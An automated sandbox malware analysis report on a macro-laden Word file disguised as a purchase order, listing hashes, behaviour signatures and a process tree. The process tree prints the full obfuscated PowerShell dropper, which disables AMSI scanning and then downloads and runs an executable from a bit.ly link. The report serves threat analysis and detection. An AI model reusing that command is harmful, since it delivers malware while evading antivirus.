Analysis

  • max time kernel
    71s
  • max time network
    60s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    11-03-2021 14:09

General

  • Target

    ABSURY CHINA PO#200929H3246.doc

  • Size

    137KB

  • MD5

    ac33ee5032e398b9c27377762e1f7f17

  • SHA1

    56089cc1a763cf6a078babee414ff6b9ab522a8a

  • SHA256

    de1ec15823c3d7078339d1211ffeafd491e23c409d8d55dcc25c552beb9d3c5b

  • SHA512

    4e883ecf884c46686dcd8ffa4392a1b549b0d3d4bbea9c3c07a9a421546168724da2e9b98030aed1bb99c6dee5f8cd8ae075bac4e14126bc7b7d1a61b3afde51

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://bit.ly/3cnqYgk

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 16 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ABSURY CHINA PO#200929H3246.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1812
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $sSIlTYNjhraqEeSxwG=@(91,100,111,117,98,108,101,93,36,111,115,118,101,114,32,61,32,91,115,116,114,105,110,103,93,91,101,110,118,105,114,111,110,109,101,110,116,93,58,58,79,83,86,101,114,115,105,111,110,46,86,101,114,115,105,111,110,46,109,97,106,111,114,32,43,32,39,46,39,32,43,32,91,101,110,118,105,114,111,110,109,101,110,116,93,58,58,79,83,86,101,114,115,105,111,110,46,86,101,114,115,105,111,110,46,109,105,110,111,114,59,105,102,32,40,36,111,115,118,101,114,32,45,103,101,32,49,48,46,48,41,32,123,101,99,104,111,32,87,105,110,100,111,119,115,49,48,59,36,84,81,78,61,91,83,121,115,116,101,109,46,82,117,110,116,105,109,101,46,73,110,116,101,114,111,112,83,101,114,118,105,99,101,115,46,77,97,114,115,104,97,108,93,58,58,65,108,108,111,99,72,71,108,111,98,97,108,40,40,49,50,52,55,48,45,51,51,57,52,41,41,59,91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,34,83,121,115,116,101,109,46,77,97,110,97,103,101,109,101,110,116,46,65,117,116,111,109,97,116,105,111,110,46,36,40,91,99,72,65,82,93,40,91,66,121,116,101,93,48,120,52,49,41,43,91,99,72,97,82,93,40,91,66,89,84,69,93,48,120,54,68,41,43,91,67,72,97,114,93,40,91,98,89,84,69,93,48,120,55,51,41,43,91,67,104,65,114,93,40,91,98,121,116,69,93,48,120,54,57,41,41,85,116,105,108,115,34,41,46,71,101,116,70,105,101,108,100,40,34,36,40,91,67,72,97,82,93,40,91,98,89,116,101,93,48,120,54,49,41,43,91,67,104,97,82,93,40,91,98,89,84,101,93,48,120,54,68,41,43,91,67,104,97,82,93,40,49,52,56,45,51,51,41,43,91,99,72,65,114,93,40,49,48,53,41,41,83,101,115,115,105,111,110,34,44,32,34,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,34,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,32,36,110,117,108,108,41,59,91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,34,83,121,115,116,101,109,46,77,97,110,97,103,101,109,101,110,116,46,65,117,116,111,109,97,116,105,111,110,46,36,40,91,99,72,65,82,93,40,91,66,121,116,101,93,48,120,52,49,41,43,91,99,72,97,82,93,40,91,66,89,84,69,93,48,120,54,68,41,43,91,67,72,97,114,93,40,91,98,89,84,69,93,48,120,55,51,41,43,91,67,104,65,114,93,40,91,98,121,116,69,93,48,120,54,57,41,41,85,116,105,108,115,34,41,46,71,101,116,70,105,101,108,100,40,34,36,40,91,67,72,97,82,93,40,91,98,89,116,101,93,48,120,54,49,41,43,91,67,104,97,82,93,40,91,98,89,84,101,93,48,120,54,68,41,43,91,67,104,97,82,93,40,49,52,56,45,51,51,41,43,91,99,72,65,114,93,40,49,48,53,41,41,67,111,110,116,101,120,116,34,44,32,34,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,34,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,32,91,73,110,116,80,116,114,93,36,84,81,78,41,59,125,101,108,115,101,32,123,125,59,36,99,108,105,101,110,116,32,61,32,110,101,119,45,111,98,106,101,99,116,32,83,121,115,116,101,109,46,78,101,116,46,87,101,98,67,108,105,101,110,116,59,36,97,32,61,32,39,104,116,116,112,115,58,47,47,98,105,116,46,108,121,47,51,99,110,113,89,103,107,39,46,83,112,108,105,116,40,39,44,39,41,59,36,104,117,97,115,32,61,32,36,101,110,118,58,116,101,109,112,32,43,32,39,92,109,122,110,102,99,104,104,101,109,121,119,46,101,120,101,39,59,102,111,114,101,97,99,104,40,36,98,32,105,110,32,36,97,41,123,116,114,121,123,36,99,108,105,101,110,116,46,68,111,119,110,108,111,97,100,70,105,108,101,40,36,98,46,84,111,83,116,114,105,110,103,40,41,44,32,36,104,117,97,115,41,59,73,110,118,111,107,101,45,73,116,101,109,40,36,104,117,97,115,41,59,98,114,101,97,107,59,125,99,97,116,99,104,123,119,114,105,116,101,45,104,111,115,116,32,36,95,46,69,120,99,101,112,116,105,111,110,46,77,101,115,115,97,103,101,125,125,59);[System.Text.Encoding]::ASCII.GetString($sSIlTYNjhraqEeSxwG)|&('I'+'EX');
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:840
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1756

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/840-23-0x00000000056C0000-0x00000000056C1000-memory.dmp
      Filesize

      4KB

    • memory/840-15-0x0000000002760000-0x0000000002761000-memory.dmp
      Filesize

      4KB

    • memory/840-10-0x0000000001DA0000-0x0000000001DA1000-memory.dmp
      Filesize

      4KB

    • memory/840-5-0x0000000000000000-mapping.dmp
    • memory/840-6-0x0000000076241000-0x0000000076243000-memory.dmp
      Filesize

      8KB

    • memory/840-32-0x000000007EF30000-0x000000007EF31000-memory.dmp
      Filesize

      4KB

    • memory/840-8-0x000000006A6E0000-0x000000006ADCE000-memory.dmp
      Filesize

      6.9MB

    • memory/840-12-0x00000000048F0000-0x00000000048F1000-memory.dmp
      Filesize

      4KB

    • memory/840-33-0x0000000006350000-0x0000000006351000-memory.dmp
      Filesize

      4KB

    • memory/840-31-0x0000000005800000-0x0000000005801000-memory.dmp
      Filesize

      4KB

    • memory/840-11-0x0000000004930000-0x0000000004931000-memory.dmp
      Filesize

      4KB

    • memory/840-13-0x00000000048F2000-0x00000000048F3000-memory.dmp
      Filesize

      4KB

    • memory/840-14-0x00000000020C0000-0x00000000020C1000-memory.dmp
      Filesize

      4KB

    • memory/840-24-0x00000000062C0000-0x00000000062C1000-memory.dmp
      Filesize

      4KB

    • memory/840-18-0x0000000005660000-0x0000000005661000-memory.dmp
      Filesize

      4KB

    • memory/1756-9-0x000007FEFBA41000-0x000007FEFBA43000-memory.dmp
      Filesize

      8KB

    • memory/1756-7-0x0000000000000000-mapping.dmp
    • memory/1812-2-0x0000000072541000-0x0000000072544000-memory.dmp
      Filesize

      12KB

    • memory/1812-3-0x000000006FFC1000-0x000000006FFC3000-memory.dmp
      Filesize

      8KB

    • memory/1812-4-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB